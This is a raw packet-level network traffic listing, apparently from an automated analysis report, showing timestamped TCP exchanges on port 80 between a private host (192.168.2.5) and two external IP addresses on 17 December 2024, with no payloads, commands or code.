Dec 17, 2024 06:03:33.197336912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.198333979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.198376894 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.198404074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.198470116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.199445963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.199498892 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.199532986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.199567080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.200510979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.200613022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.200647116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.200759888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.201642036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.201757908 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.201803923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.201803923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.202703953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.202784061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.202934980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.202934980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.204808950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.204865932 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.204906940 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.204966068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.204966068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.204966068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.205008030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.205111027 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.206034899 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.206118107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.206165075 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.206773996 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.207087040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.207211971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.207353115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.207353115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.208180904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.208314896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.208811998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.208811998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.209297895 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.209371090 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.209448099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.209448099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.210377932 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.210443020 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.210521936 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.256633043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.256689072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.256854057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.256854057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.257080078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.257354021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.257389069 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.257445097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.257689953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.257689953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.258414030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.258536100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.258569956 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.258644104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.259612083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.259649038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.259880066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.259881020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.260871887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.260924101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.261071920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.261142015 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.261718035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.261868000 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.262589931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.262804985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.262942076 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.262984991 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.263057947 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.263890982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.264033079 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.264067888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.264095068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.265028954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.265117884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.265165091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.265289068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.266081095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.266227961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.266408920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.266408920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.267175913 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.267256975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.267306089 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.267741919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.268305063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.268424988 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.268536091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.268536091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.269403934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.269467115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.269515991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.269607067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.270478964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.270560026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.270607948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.270701885 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.271636963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.271789074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.272094965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.272095919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.272676945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.272794008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.272857904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.273009062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.273786068 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.273844004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.273922920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.274403095 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.274883032 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.275010109 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.275104046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.275104046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.275980949 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.276134014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.276585102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.276585102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.277064085 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.277189016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.277285099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.277286053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.278175116 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.278312922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.278384924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.278620958 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.279275894 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.279412031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.279484987 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.279484987 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.280359030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.280510902 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.280601978 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.280793905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.281466007 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.281615973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.281702995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.281702995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.282561064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.282680035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.282969952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.282969952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.283664942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.283782959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.283871889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.284054995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.284753084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.284873009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.285156965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.285156965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.285861015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.285934925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.286032915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.286233902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.286973953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.287019014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.287061930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.287354946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.288060904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.288172960 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.288254023 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.288487911 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.289158106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.289297104 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.289330006 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.289573908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.290236950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.290379047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.290544033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.290544033 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.291368961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.291423082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.291429043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.291495085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.292443991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.292579889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.292903900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.292903900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.293545008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.293714046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.293821096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.293821096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.294635057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.294749022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.295010090 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.295010090 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.295739889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.295881033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.295958042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.295958042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.296838999 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.296958923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.296993017 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.297040939 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.297940969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.298077106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.298137903 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.298137903 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.299030066 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.299082994 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.299349070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.299349070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.300129890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.300272942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.300317049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.300389051 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.301238060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.301359892 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.301394939 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.301426888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.302341938 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.302445889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.302527905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.302639008 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.303435087 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.303554058 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.303986073 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.303986073 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.304516077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.304651976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.304685116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.304757118 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.305617094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.305828094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.305861950 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.305929899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.306701899 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.306826115 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.306859970 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.307008982 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.307822943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.307955027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.307988882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.308017015 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.308908939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.309042931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.309082031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.309111118 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.310014963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.310137987 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.310259104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.310259104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.311093092 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.311230898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.311264992 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.311347961 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.312357903 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.312470913 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.312514067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.312849998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.313304901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.313425064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.313519955 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.313520908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.448858976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.448915958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.449086905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.449142933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.449142933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.449142933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.449237108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.449383974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.450118065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.450242996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.450407982 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.451220036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.451334000 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.451342106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.451415062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.452229977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.452347040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.452421904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.452421904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.453267097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.453377962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.453517914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.453517914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.454369068 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.454421997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.454454899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.454740047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:35.733540058 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:35.733762980 CET	49899	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:35.853538990 CET	80	49899	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:35.853667974 CET	49899	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:35.853693962 CET	80	49877	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:35.853848934 CET	49877	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:35.855036974 CET	49899	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:35.974822044 CET	80	49899	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:37.199486017 CET	80	49899	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:37.199584961 CET	49899	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:37.201108932 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:37.201471090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:37.321242094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:37.321331024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:37.321361065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:37.321525097 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:37.321618080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:37.441303968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.647948980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648092985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648130894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648148060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648165941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648189068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648189068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648200989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648210049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648245096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648255110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648288965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648298025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648323059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648332119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648370028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648376942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648412943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.648420095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.648456097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.768524885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.768542051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.768687963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.772375107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.772442102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.845350981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.845366955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.845448971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.849478960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.849559069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.849610090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.849672079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.857980967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.857994080 CET	80	49902	31.41.244.11	192.168.2.5
